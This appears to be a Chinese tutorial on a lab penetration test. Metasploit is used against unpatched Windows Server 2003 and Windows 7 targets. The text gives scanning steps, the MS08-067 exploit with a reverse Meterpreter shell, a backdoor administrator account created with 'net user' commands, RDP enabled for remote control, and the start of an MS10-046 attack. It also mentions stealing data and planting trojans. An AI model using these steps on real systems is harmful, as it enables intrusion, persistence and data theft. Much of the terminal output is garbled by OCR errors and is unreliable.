Metasploit利用溢出漏洞遠(yuǎn)控Windows靶機(jī)操作指南剖析

1、1網(wǎng)絡(luò)測試環(huán)境構(gòu)建首先需要先配置好一個(gè)滲透測試用的網(wǎng)絡(luò)環(huán)境，包括如圖1所示的運(yùn)行KaliLinux系統(tǒng)的計(jì)算機(jī)，如圖2所示的WindowsServer2003系統(tǒng)的計(jì)算機(jī)和如圖3所示的運(yùn)行Windows7系統(tǒng)的計(jì)算機(jī)。顯然這三臺(tái)計(jì)算機(jī)處于同一個(gè)網(wǎng)段中，可以相互通訊，Kali系統(tǒng)用作攻擊機(jī)，下面將在此系統(tǒng)上運(yùn)行Metasploit進(jìn)行滲透測試，而Windows2003和Windows7系統(tǒng)都是本次任務(wù)中需要進(jìn)行滲透入侵的靶機(jī)，保持安裝后的默認(rèn)狀態(tài)，沒有打額外的系統(tǒng)安全補(bǔ)丁。10KiB)(1.8rootkali:*ThuMay14,12:26PMroot(11.2MiB):1920rootgkal

2、i:-#|ootkali:frame:0carrier:0frame:0carrier:0ComputerLinkencap:LocalLoopbackinetaddr:Mask:inet6addr:1/128Scope:HostUPLOOPBACKRUNNINGMTU:65536Metric:1RXpackets:32errors:0dropped:0overruns:0TXpackets:32errors:0dropped:(3overruns:0collisions:0txqueuelen:0RXbytes:1920(1.8KiB)FileEditViewSearchTerminalHe

3、lpApplicationsPlacesTQtrootkali:-#ifconfigeth0Linkencap:EthernetHWaddr00:0c:29:00:25:flinetaddr:10.1O.10.137Beast:55Mask:inet6addr:fe80:20c:29ff:fe00:25f1/64Scope:LinkUPBROADCASTRUNNINGMULTICASTMTU:1500Metric:1RXpackets:12857errors:0dropped:0overruns:0TXpackets:25602errors:0dropped:0ovrruns:0collisi

4、ons:0txqueuelen:10Q0RXbytes:911915(890.5KiB)TXbytes:11767210圖1Kali攻擊機(jī)圖2Windows2003靶機(jī):localdomain:e80：29cc：f859：713c：c0e0zll:10.1.I.136:10.10102:MJserston:媒體已斷幵:localdomain以太網(wǎng)適配器本地連接:回如049除總2015/5/15SN6DVP-的I止-定臨科天囂土掩網(wǎng)囂U4網(wǎng)認(rèn)連本IP子默隧道適配器isatap.localdonain:圖3Windows7靶機(jī)2掃描靶機(jī)在正式開始滲透之前，應(yīng)該對(duì)靶機(jī)進(jìn)行掃描探測工作，搞清楚滲透目標(biāo)

5、的系統(tǒng)類型、開放的端口服務(wù)、可能存在的安全漏洞等。如圖4所示，在Kali攻擊機(jī)上執(zhí)行Msfconsole命令，即可進(jìn)入Metasploit環(huán)境，如圖5所示。圖3-4msfconsole命令圖5進(jìn)入msf環(huán)境現(xiàn)在可以利用MSF框架中集成的Nmap掃描器對(duì)滲透測試目標(biāo)進(jìn)行掃描，如圖6和7所示，獲取了靶機(jī)的開放服務(wù)和操作系統(tǒng)類型等信息。rootkali:STATEopenp皂nopenpenopenbios-ssnnoiicr-osoft-dsNFS-or-IISLSA-or-ntermclosedportsSERVICEOSci亡匸eict：ionperforroiedPleasereportan

6、yIncorrectresultsathttp:/nmapciT?g/Bubnd-t/.Nmapdone:1TPaddress(1hostupscairnedin1理2secondsmsfImsnmap-O10.10.IO.138exec:ranap-O10101013EStartingNraap石姓7(http:/nraap.ciHgat2015-05-1413:02EDTNmapscamreportfor10.10.IO.138Hostisup(000017slatencyNotshown:995PORT135/tc.p139/tcp445/tcplQ25/tcp1026/tcpMACAd

7、dress:00:0C:29:FA:62:02(VMware)Devicetype:generalpurposeRunning:MicrosoftWindowsXP|2003OSCPE:cpe:/o:niicrosQft:windows_xpcpe:/o:nn.croscift:windows_server_2003OSdetails:MicrosoftWindowsXPSP2orSP3forWindowsServer2003N已匸workDistance:1hop圖6Windows2003掃描結(jié)果囲rootkali:nmap-O10.10.IO.136exec:ranap-O10101013

8、石StartingNraap石姓7(Ii匸tp:/nmapci:rgat2015-05-1413:03EDTNmapscamreportfor10.10.IO.136Hostisup(0.00030呂latencyNotshown:993filteredports1PORTSTATESERVICE1135/tcpopenrasrpc139/tcpopennetbios-ssn|445/tcpopenrmicrosoft-dsI554/tcpopenrtsp2869/tcpopenicslap5357/匸cpopenwsdapilQ243/tcpopenunknownMACAddress:00:

9、0C:29:87:6B:IF(VMware)Warning:OSScauiresultsmaybeunreliablebecausewecouldnotindatleast1openand1closedportDevicetype:generalpurpose|phoneRunning:MicrosoftWindows2008|7|Phone|VistaOSCPE:cpe:/o:iaicrosQft:windows_server_2008:r2cpe:/iraicrQSQft:windows_7:-:professionalcpe:/oinuzcros口匸:windQws_8cpe:/oiio

10、icroscift:windowscpe:/o:niicrQscift:wlndowsista:-cpe:/Q：iiiLLc.rosoft:wlndowsisra:splOSdetails:WindowsServer2008R2,MicrosoftWindows7ProfessionalorWindows8fMicrosoftWindowsPhone75orE.O*MicrosoftWindowsVistaSPOorSPlfWindowsServer2Q08SPlforWindows7,MicrosoftWindowsVistaSP2fWindows7SP1,orWindowsServer20

11、08N已匸workDistance:1hopOSci亡匸eict：ionperforroied.PleasereportanyIncorrectresultsathttp:/nmapciT?g/Bubnd.t/.Nmapdone:1TPaddress(1hostupscairnedin石9弓secondsmsf|圖7Windows7掃描結(jié)果利用掃描器的腳步插件，還有可能直接探測出目標(biāo)系統(tǒng)的安全漏洞，例如如圖8所示，Nmap利用smb-check-vulns插件掃描探測出了Windows2003靶機(jī)存在MS08_067漏洞。囲rootkali:StartingNmap石47(http:/nraa

12、pcii?g)at2015-05-1413:17EDTNmapscanreportfor10101013BHostisup(000010slatencyNotshown:995closedportsPORTSTATESERVICE135/匸cppenmsrpe139/tcppennetbios-ssn445/tcpp皂nnicrciscift-ds1025/tcppenNFS-or-IIS1026/tcppenLSA-Qr-nteniiMACAddr皂s已：00:OC:29:FA:62:02(VMwareHostscriptresults:|smb-check-vulns:|MS08-067:

13、VULNERABLE|Confieker:|SMBv2DoS|MS06-025:IMS07-029:LikelyCLEAN(CVE-2009-3103:NOTVULNERABLENOSERVICENOSERVICE(theRasRPCserviceisinactive(theDnsServerRPCserviceisinac匸巳Nmapdone:1msfIIPaddress(1host：up)sc.aimedin512seconds圖8漏洞掃描結(jié)果3利用MS08_067漏洞滲透入侵MS08_067是一個(gè)曾經(jīng)在各種Windows操作系統(tǒng)中廣泛存在，而且危害特別嚴(yán)重的緩沖器溢出類型的漏洞，利用它可

14、以在無需知道任何賬戶密碼，也不需要受害者配合的情況下，通過網(wǎng)絡(luò)直接遠(yuǎn)程控制受害的計(jì)算機(jī)。為實(shí)現(xiàn)Metasploit在Windows操作系統(tǒng)的滲透測試，Metasploit目前提供了三種用戶使用接口，一個(gè)是GUI模式，另一個(gè)是console模式，第三個(gè)是CLI（命令行）模式。目前這三種模式各有優(yōu)缺點(diǎn)，本文僅使用MSFconsole模式。因?yàn)樵赾onsole中可以使用MSF所提供的所有功能，還可以在console中執(zhí)行一些其他的外部命令，如ping。既然已經(jīng)知道Windows2003靶機(jī)存在MS08_067漏洞，下面就在Metasploit環(huán)境中利用它進(jìn)行滲透入侵。首先，通過使用“search”命

15、令，搜索該漏洞對(duì)應(yīng)的模塊，并啟用該滲透攻擊模塊查看基本信息，然后，輸入useexploit/Windows/smb/ms08_067_netapi命令表示選擇利用這個(gè)漏洞，如圖9所示。圖9選擇漏洞然后用set命令選擇一旦利用漏洞滲透進(jìn)去使用什么攻擊載荷，這里使用MSF框架里功能強(qiáng)大的Meterpreter攻擊模塊下的反向連接shell載荷，如圖10所示。圖10選擇攻擊載荷用showoptions命令查看還有哪些參數(shù)需要配置，根據(jù)目標(biāo)情況配置滲透攻擊的選項(xiàng)。如圖11所示rootkali:-=I回lETpayload=windows/meterpreter/reversetcpmsfexploit

16、(msOB067showoptionsModuleoptions(explit/windows/smb/ias08067netapi:NameCurrent5皂匸tingRequiredDescriptionRHOST工皂呂Th皂targetaddr皂呂已RPORT445yesSettheSMBserviceportSMBPIPEBROWSERyesThepipenaraetouse:(BROWSER,SRVSVCPayloadoptions(windows/meterpreter/reversetcp):NameCurrentSettingRequiredDescriptionEXITFUN

17、CthreadyesExitteclmique(accep匸巳d:cessfnone)LHOSTyesThelistenaddressLPORT4妊4理yesThelistenportExploittarget:Id.Naitte0AutomaticTargetingrr.sfexploit()1圖11需要配置的參數(shù)配置本地攻擊機(jī)和遠(yuǎn)程靶機(jī)的IP地址，以及靶機(jī)系統(tǒng)的類型，如圖12所示。圖12配置參數(shù)所有需要的參數(shù)配置好了以后，在進(jìn)行exploit滲透攻擊時(shí)，會(huì)出現(xiàn)一些狀況，有可能滲透不成功，需要在這時(shí)候謹(jǐn)慎。用exploit或run命令發(fā)動(dòng)攻擊，如圖13所示，滲透成

18、功后，設(shè)置的回連主機(jī)就是Metasploit攻擊主機(jī)，攻擊主機(jī)會(huì)獲得一個(gè)meterpreter控制會(huì)話session。圖13成功獲取session用了meterpreter的session后，即可用各種命令對(duì)遠(yuǎn)程靶機(jī)進(jìn)行操作，如圖14、15所示，在目標(biāo)靶機(jī)上新建了一個(gè)賬號(hào)hacker和密碼，并將其加入到管理員組。為后續(xù)的遠(yuǎn)程控制提供方便?；豐endingstage(770048bytesto10101013SMeterpretersession1opened(1037:曉萼44-101010l38:1048)at2015-05-1竝13:34:30-0400趨rootkali:|nk皂匸皂:r

19、p工皂匸皂工sh皂11Process1164createdChannel1created.MicrosoftWindows吾汾5.2.3790(C)顎ESSSQS1335-2003MicrosoftCorp.圖14新建賬號(hào)趕rootkali:C:WINDOWSsystem32netuserhacker123456/addnetuserhacker123456/addC:W工NDOWSs：s匸皂m32netlocalgroupadninistratrshack皂工/addnetlocalgroupadiministratorshacker/addC:WINDOWSsysteir.32圖15賬號(hào)加

20、入管理員組為了更方便遠(yuǎn)程操作被成功滲透控制的靶機(jī)，還可以利用Meterpreter的強(qiáng)大功能，打開目標(biāo)的3389遠(yuǎn)程桌面端口，如圖16所示。囲rocitkali:-netlocalgroupadministratorshacker/addC:WINDOWSsystera32exitexit亡匸已:rp工亡匸已工rungetgui-eWindowsRemo匸皂D皂sk匸cipConigurait：j_ciiiMeterpreterScriptbyDarkoperatorCarlosPerezcarlos_perezdarkoperatorcomEnaiblingRemoteDesktopRDPi

21、sdisabled;enatblingitSettingTezmoLinalServicesservicestartupmodeTheTernoLinalServicesserviceisn匸settoamza,changingittoautoOpeningportinlocalfirewallifnecessaryForcleanupuseconmiajid:runnnilti_consalF_ucmjnLand.-rc/root/rosf理/Idgs/surip匸s/g皂tgui/cleaLn_up201505143822rc|nkEm?p工亡匸皂工I圖3-16打開遠(yuǎn)程桌面服務(wù)現(xiàn)在可以用遠(yuǎn)

22、程桌面客戶端去連接靶機(jī)的遠(yuǎn)程桌面服務(wù)，如圖17所示，用剛才新創(chuàng)建的賬號(hào)和密碼成功登錄到系統(tǒng)后，即可在圖形界面下方便地操作遠(yuǎn)程靶機(jī)，進(jìn)行到這一步，我們可以對(duì)靶機(jī)進(jìn)行一些信息的竊取，或是一些病毒和木馬的上傳。如圖18所示。圖17通過遠(yuǎn)程桌面登錄圖18通過遠(yuǎn)程桌面操作至此，Metasploit利用MS08_067漏洞滲透入侵遠(yuǎn)程Windows2003靶機(jī)的任務(wù)全部完成了。4利用MS10_046漏洞滲透入侵因?yàn)閃indows7系統(tǒng)靶機(jī)上不存在MS08_067漏洞，為了滲透這個(gè)目標(biāo)，我們重新用USE命令選擇另一個(gè)安全漏洞MS10_046，如圖19所示。趨rootkali:explit/windows/b

23、rowser/ms10046shortcuticond.111C:WINDOWSsystem32exitexitrm皂匸Ei:p工匸己工rungetgui-eWindowsRemo匸皂DesktopConfigiirarciciiiM皂匸皂rpr皂匸皂工ScriptbyDarkoperatorCarlosPerezcarlos_perezdarkoperatorcomEnaiblingRemoteD皂sktop艮D(zhuǎn)Pisdisabled;enatblingitSettingTerntinalServicesservicestartupmadeTheTenninalServicesservice

24、isn匸settoauto,changingittoautoOpeningportinlocalfirewallIfnecessaryForcleanupusecaramand:runnnilti_cansale_canmiaiid.-rc/rao匸/rnsf4/lags/scripts/getgui/cleaLn_up201505143822rcnil皂匸皂：rp工皂匸皂工backgroundBackgroundingsession1nofexploit(EEs0z_0_neti)useoaderiEsfexploit(eesI匸34fishortcuticon圖19漏洞選擇再用命令show

25、option查看利用這個(gè)漏洞需要配置哪些參數(shù)，如圖20所示。趨rootkali:Backgroundingsession1nisfexploit(ms06067_neti)useexplit/windows/browser/ms10_046_shortcut_icon_d.l11oadermsfexploit()showoptionsModuleoptions(exploit/windows/browser/mslO046shortcutIcondllloaderji:NaiiueCurrentSetting底亡gu:L工idDescriptionSRVHOSTyesdr皂日sontheloc

26、almachineorSRVPORT30SSLCertndoimlygenerated)DNCHOSTclients(ex:URIPATH/ThelocalhosttolistenciriThismustbeanadExploittarget:IdNaoeAutomaticmsfexploit(yesnonoyesThedaeiaonporttolistenon(donotchange)Pathtoac-ustomSSLcertifIca/tE(d皂faultisraThehostportionoftheUNCpathtoprovidetoTheURItouse(donotchamge圖20查

27、看參數(shù)用set命令配置監(jiān)聽服務(wù)器為本地攻擊機(jī)的IP地址，如圖21所示。圖21配置監(jiān)聽地址然后繼續(xù)配置漏洞利用成功后的攻擊載荷還是Meterpreter,配置攻擊載荷所需的本地地址和遠(yuǎn)程地址，如圖22所示。圖22攻擊載荷配置再次用showoptions命令檢查參數(shù)配置正確后，exploit發(fā)動(dòng)攻擊，如圖23所示。囲roctkali:rasfexploit(showoptionsModuleoptions(explnit/windows/browser/ms10046shortcuticondlllaader:NaaueCurrentSettingRequired.DescriptionSRVHOST101010137dressonthelocalmachineSRVPORT80SSLCertndaialygeneratedUNCHOSTclients(ex:1.2.34).URIPATH/yesryesnonoyesThelocalhosttolis匸&non.Thismustbeanad.Thedaemonporttolistenon(donotchange)Pathtoac-ustoniSSLcertificate(defaultisraThehostportiontheUNCpath